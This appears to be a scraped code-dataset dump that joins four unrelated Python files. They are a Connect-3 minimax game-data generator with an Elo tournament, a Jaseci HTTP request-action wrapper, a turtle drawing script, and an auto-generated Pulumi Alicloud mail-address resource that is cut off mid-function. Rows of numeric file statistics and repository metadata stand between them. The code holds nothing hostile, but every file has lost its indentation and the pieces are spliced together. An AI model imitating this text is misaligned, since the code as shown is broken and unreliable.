number_of_equal_sequences = 0
# index of data that are equals and we need to remove from dataset later
indx_to_remove = []
# we record here all the different unique sequences done by every single player
sequences_per_player = {}
for depth1 in depth_list:
label = int(depth1)
if label not in sequences_per_player:
sequences_per_player[label] = []
for depth2 in depth_list:
print("Starting minimax depth " + str(depth1) + " vs minimax " + str(depth2))
if logger:
logger.info(
"**********MINIMAX_depth_"
+ str(depth1)
+ "_(X) VS (O)_MINIMAX_depth_"
+ str(depth2)
+ "**********"
)
for i in range(number_of_games):
# temp action and board state,
#action_total = []
board_plus_action_total = []
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
actions[player1] = act
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
_, _, done, _ = game.step(actions)
elif actual_player == player2_ID:
act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
actions[player2] = act
_, _, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if logger:
logger.info("Game number " + str(i) + "/" + str(number_of_games))
logger.info(
"Player " + str(actual_player + 1) + " actions: " + str(act)
)
logger.info("\n" + repr(board))
logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
if done["__all__"]:
if logger:
logger.info("PLAYER " + str(game.winner + 1) + " WON...")
logger.info(
"CURRENT SCORE: "
+ str(game.score[player1])
+ " VS "
+ str(game.score[player2])
)
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
dataset_full_games.append([])
dataset_full_games[-1].append(board_plus_action_total)
dataset_full_games[-1].append(label)
for j in range(len(board_plus_action_total)-(sequence_len-1)):
to_string=str(board_plus_action_total[j:j+sequence_len])
if to_string in sequence_list:
indx = sequence_list.index(to_string)
number_of_equal_sequences += 1
if indx not in indx_to_remove:
indx_to_remove.append(indx)
else:
sequences_per_player[label].append(to_string)
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_total[j:j+sequence_len])
dataset[-1].append(label)
final_dataset = []
for i,elem in enumerate(dataset_no_clones):
if i not in indx_to_remove:
final_dataset.append(elem)
count = 0
final_sequences = {}
for elem in sequences_per_player:
final_sequences[elem] = []
for indx,elem_2 in enumerate(sequences_per_player[elem]):
if count not in indx_to_remove:
final_sequences[elem].append(elem_2)
count += 1
print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
return games_list, sequence_list, dataset,dataset_no_clones,final_dataset,dataset_full_games,final_sequences
def minimax_vs_model_connect3_generate_data(depth_list,weights,model,number_of_stochastic_moves,number_of_games,sequence_len,randomize= True,logger = None):
"""
simulates 'number_of_games' between all combinations of minimax depth
inside the depth list.
:params:
depth_list: list of int
minimax depths
number_of_games: int
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
dataset_full_games = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
# sequence of configuration encoded as a string
sequence_list = []
number_of_equal_sequences = 0
# index of data that are equals and we need to remove from dataset later
indx_to_remove = []
# we record here all the different unique sequences done by every single player
sequences_per_player = {}
for depth1 in depth_list:
label = int(depth1)
if label not in sequences_per_player:
sequences_per_player[label] = []
for w2_indx,w2 in enumerate(weights):
print("Starting minimax depth_" + str(depth1) + " vs model with weights " + str(w2))
model.base_model.set_weights(weights[w2])
for i in range(number_of_games):
# temp action and board state,
#action_total = []
timestep = 0
board_plus_action_total = []
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
timestep += 1
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
actions[player1] = act
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
_, _, done, _ = game.step(actions)
elif actual_player == player2_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board_p2 #reshaped_board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if logger:
logger.info("Game number " + str(i) + "/" + str(number_of_games))
logger.info(
"Player " + str(actual_player + 1) + " actions: " + str(act)
)
logger.info("\n" + repr(board))
logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
if done["__all__"]:
if logger:
logger.info("PLAYER " + str(game.winner + 1) + " WON...")
logger.info(
"CURRENT SCORE: "
+ str(game.score[player1])
+ " VS "
+ str(game.score[player2])
)
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
dataset_full_games.append([])
dataset_full_games[-1].append(board_plus_action_total)
dataset_full_games[-1].append(label)
for j in range(len(board_plus_action_total)-(sequence_len-1)):
to_string=str(board_plus_action_total[j:j+sequence_len])
if to_string in sequence_list:
indx = sequence_list.index(to_string)
number_of_equal_sequences += 1
if indx not in indx_to_remove:
indx_to_remove.append(indx)
else:
sequences_per_player[label].append(to_string)
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_total[j:j+sequence_len])
dataset[-1].append(label)
final_dataset = []
for i,elem in enumerate(dataset_no_clones):
if i not in indx_to_remove:
final_dataset.append(elem)
count = 0
final_sequences = {}
for elem in sequences_per_player:
final_sequences[elem] = []
for indx,elem_2 in enumerate(sequences_per_player[elem]):
if count not in indx_to_remove:
final_sequences[elem].append(elem_2)
count += 1
print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
return games_list, sequence_list, dataset,dataset_no_clones,final_dataset,dataset_full_games,final_sequences
def minimax_vs_minimax_connect3_single_game(depth1,depth2,sequence_len,discarded_moves=2,randomize= True,logger = None):
"""
return observation plus actions data of a single game that are
with shape readable by the lstm
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
board_plus_action_total = []
game_over = False
actions = {}
single_game = []
#label = depth1
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
else:
starting_player = player1_ID
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
actions[player1] = act
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
_, _, done, _ = game.step(actions)
elif actual_player == player2_ID:
act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
actions[player2] = act
_, _, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if logger:
logger.info(
"Player " + str(actual_player + 1) + " actions: " + str(act)
)
logger.info("\n" + repr(board))
logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
if done["__all__"]:
if logger:
logger.info("PLAYER " + str(game.winner + 1) + " WON...")
logger.info(
"CURRENT SCORE: "
+ str(game.score[player1])
+ " VS "
+ str(game.score[player2])
)
game_over = True
# ADD ENCODED GAME TO THE LISt
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
return None
single_game.append([])
for j in range(len(board_plus_action_total)-(sequence_len-1)):
if j >= discarded_moves:
single_game[-1].append(board_plus_action_total[j:j+sequence_len])
if len(single_game[-1]) == 0:
return None
#single_game[-1].append(label)
return single_game
def minimax_vs_minimax_connect3_single_game_plus_outcome(depth1,depth2,sequence_len,discarded_moves=2,randomize= True,logger = None):
"""
return observation plus actions data of a single game that are
with shape readable by the lstm.
It also discard some of the initial moves since they could be the
same for different level of playing
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
board_plus_action_total = []
game_over = False
actions = {}
single_game = []
#label = depth1
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
else:
starting_player = player1_ID
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
actions[player1] = act
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
_, rew, done, _ = game.step(actions)
elif actual_player == player2_ID:
act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if logger:
logger.info(
"Player " + str(actual_player + 1) + " actions: " + str(act)
)
logger.info("\n" + repr(board))
logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
if done["__all__"]:
if logger:
logger.info("PLAYER " + str(game.winner + 1) + " WON...")
logger.info(
"CURRENT SCORE: "
+ str(game.score[player1])
+ " VS "
+ str(game.score[player2])
)
game_over = True
if rew["player1"] == 1:
outcome = 7.0
elif rew["player1"] == -1:
outcome = 8.0
elif rew["player1"] == 0:
outcome = 9.0
# ADD ENCODED GAME TO THE LISt
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
return None
board_plus_action_and_outcome = []
for elem in board_plus_action_total:
new_elem = np.append(elem,outcome)
board_plus_action_and_outcome.append([new_elem])
single_game.append([])
for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
if j >= discarded_moves:
single_game[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
#single_game[-1].append(label)
if len(single_game[-1]) == 0:
return None
return single_game
def minimax_tournament(depth_list,number_of_games,randomize=True):
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
score_total = {}
elo_diff_total = {}
for depth2 in depth_list:
for depth1 in depth_list:
if depth2 >= depth1:
continue
print("Starting minimax depth " + str(depth1) + " vs minimax " + str(depth2))
game.reset_score()
for i in range(number_of_games):
# temp action and board state,
#action_total = []
game_over = False
actions = {}
game.reset(randomize=randomize)
while not game_over:
actual_player = game.current_player
board = game.board
if actual_player == player1_ID:
act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
actions[player1] = act
_, _, done, _ = game.step(actions)
elif actual_player == player2_ID:
act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
actions[player2] = act
_, _, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if done["__all__"]:
game_over = True
score = game.score[player1] / number_of_games + game.num_draws / (
2 * number_of_games
)
if score >= 10 / 11:
elo_diff = 400
elif score == 0 or score <= 1 / 11:
elo_diff = -400
else:
elo_diff = -400 * math.log((1 / score - 1), 10)
print("minimax depth " + str(depth1) + " vs minimax " + str(depth2) + " elo difference: " + str(elo_diff))
win_rate = game.score[player1]/number_of_games
print("minimax depth " + str(depth1) + " win rate: " + str(win_rate))
score_total["depth" + str(depth1)+"_vs_depth" + str(depth2)] = win_rate
elo_diff_total["depth" + str(depth1)+"_vs_depth" + str(depth2)] = elo_diff
return score_total,elo_diff_total
def return_one_hot(depth_list,depth_indx):
one_hot_vec = [0]*len(depth_list)
indx = depth_list.index(depth_indx)
one_hot_vec[indx] = 1
return one_hot_vec
def count_elem_in_dataset(dataset,classes):
dataset_classes = {}
for c in classes:
dataset_classes[c] = 0
for elem in dataset:
if elem[1] in classes:
dataset_classes[elem[1]] +=1
return dataset_classes
if __name__ == "__main__":
depth_list = [1,2,3,4,5,6]
score, elo_diff = minimax_tournament(depth_list,100)
| 42.928157
| 166
| 0.495275
| 5,974
| 59,155
| 4.623368
| 0.051724
| 0.027227
| 0.035301
| 0.034757
| 0.899819
| 0.885409
| 0.882259
| 0.873968
| 0.864518
| 0.863613
| 0
| 0.020516
| 0.426524
| 59,155
| 1,378
| 167
| 42.928157
| 0.793656
| 0.070543
| 0
| 0.860968
| 0
| 0
| 0.038302
| 0.00044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013388
| false
| 0
| 0.014418
| 0
| 0.045314
| 0.032956
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be59a7815cdbbe5547e7f870f234461a7ff66030
| 2,534
|
py
|
Python
|
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
"""Built in actions for Jaseci"""
import requests
from jaseci.actions.live_actions import jaseci_action
@jaseci_action()
def get(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.get(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
@jaseci_action()
def post(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.post(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
@jaseci_action()
def put(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.put(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
@jaseci_action()
def delete(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.delete(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
@jaseci_action()
def head(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.head(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
@jaseci_action()
def options(url: str, data: dict, header: dict):
"""
Issue request
Param 1 - url
Param 2 - data
Param 3 - header
Return - response object
"""
res = requests.options(url, json=data, headers=header)
ret = {'status_code': res.status_code}
try:
ret['response'] = res.json()
except Exception:
ret['response'] = res.text
return ret
| 21.474576
| 58
| 0.59708
| 321
| 2,534
| 4.65109
| 0.127726
| 0.080375
| 0.112525
| 0.056263
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0
| 0.00982
| 0.276638
| 2,534
| 117
| 59
| 21.65812
| 0.804692
| 0.214286
| 0
| 0.75
| 0
| 0
| 0.09005
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.035714
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be6b0c34a40956e84ba6ab474ccc037dc5acfc41
| 489
|
py
|
Python
|
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
import turtle
my_turtle = turtle.Turtle()
my_turtle.forward(100)
my_turtle.left(90)
my_turtle.forward(100)
my_turtle.left(90)
my_turtle.forward(100)
my_turtle.left(90)
my_turtle.forward(100)
my_turtle.backward(100)
my_turtle.right(180)
my_turtle.right(45)
my_turtle.forward(50)
my_turtle.right(45)
my_turtle.forward(100)
my_turtle.right(135)
my_turtle.forward(50)
my_turtle.left(45)
my_turtle.forward(100)
my_turtle.left(135)
my_turtle.forward(50)
my_turtle.left(45)
my_turtle.forward(100)
| 21.26087
| 27
| 0.811861
| 90
| 489
| 4.166667
| 0.144444
| 0.469333
| 0.4
| 0.336
| 0.829333
| 0.829333
| 0.824
| 0.602667
| 0.602667
| 0.602667
| 0
| 0.114224
| 0.051125
| 489
| 23
| 28
| 21.26087
| 0.693966
| 0
| 0
| 0.73913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be7014e5fe081ff15a42629ae30c876c60f6b3fe
| 15,418
|
py
|
Python
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['MailAddressArgs', 'MailAddress']
@pulumi.input_type
class MailAddressArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
sendtype: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MailAddress resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "sendtype", sendtype)
if password is not None:
pulumi.set(__self__, "password", password)
if reply_address is not None:
pulumi.set(__self__, "reply_address", reply_address)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def sendtype(self) -> pulumi.Input[str]:
"""
Account type. Valid values: `batch`, `trigger`.
"""
return pulumi.get(self, "sendtype")
@sendtype.setter
def sendtype(self, value: pulumi.Input[str]):
pulumi.set(self, "sendtype", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="replyAddress")
def reply_address(self) -> Optional[pulumi.Input[str]]:
"""
Return address.
"""
return pulumi.get(self, "reply_address")
@reply_address.setter
def reply_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reply_address", value)
@pulumi.input_type
class _MailAddressState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MailAddress resources.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if password is not None:
pulumi.set(__self__, "password", password)
if reply_address is not None:
pulumi.set(__self__, "reply_address", reply_address)
if sendtype is not None:
pulumi.set(__self__, "sendtype", sendtype)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="replyAddress")
def reply_address(self) -> Optional[pulumi.Input[str]]:
"""
Return address.
"""
return pulumi.get(self, "reply_address")
@reply_address.setter
def reply_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reply_address", value)
@property
@pulumi.getter
def sendtype(self) -> Optional[pulumi.Input[str]]:
"""
Account type. Valid values: `batch`, `trigger`.
"""
return pulumi.get(self, "sendtype")
@sendtype.setter
def sendtype(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sendtype", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Account Status freeze: 1, normal: 0.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class MailAddress(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Direct Mail Mail Address resource.
For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
> **NOTE:** Available in v1.134.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.directmail.MailAddress("example",
account_name="example_value@email.com",
sendtype="batch")
```
> **Note:**
A maximum of 10 mailing addresses can be added.
Individual users: Up to 10 mailing addresses can be deleted within a month.
Enterprise users: Up to 10 mailing addresses can be deleted within a month.
## Import
Direct Mail Mail Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MailAddressArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Direct Mail Mail Address resource.
For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
> **NOTE:** Available in v1.134.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.directmail.MailAddress("example",
account_name="example_value@email.com",
sendtype="batch")
```
> **Note:**
A maximum of 10 mailing addresses can be added.
Individual users: Up to 10 mailing addresses can be deleted within a month.
Enterprise users: Up to 10 mailing addresses can be deleted within a month.
## Import
Direct Mail Mail Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
```
:param str resource_name: The name of the resource.
:param MailAddressArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MailAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MailAddressArgs.__new__(MailAddressArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["password"] = password
__props__.__dict__["reply_address"] = reply_address
if sendtype is None and not opts.urn:
raise TypeError("Missing required property 'sendtype'")
__props__.__dict__["sendtype"] = sendtype
__props__.__dict__["status"] = None
super(MailAddress, __self__).__init__(
'alicloud:directmail/mailAddress:MailAddress',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'MailAddress':
"""
Get an existing MailAddress resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MailAddressState.__new__(_MailAddressState)
__props__.__dict__["account_name"] = account_name
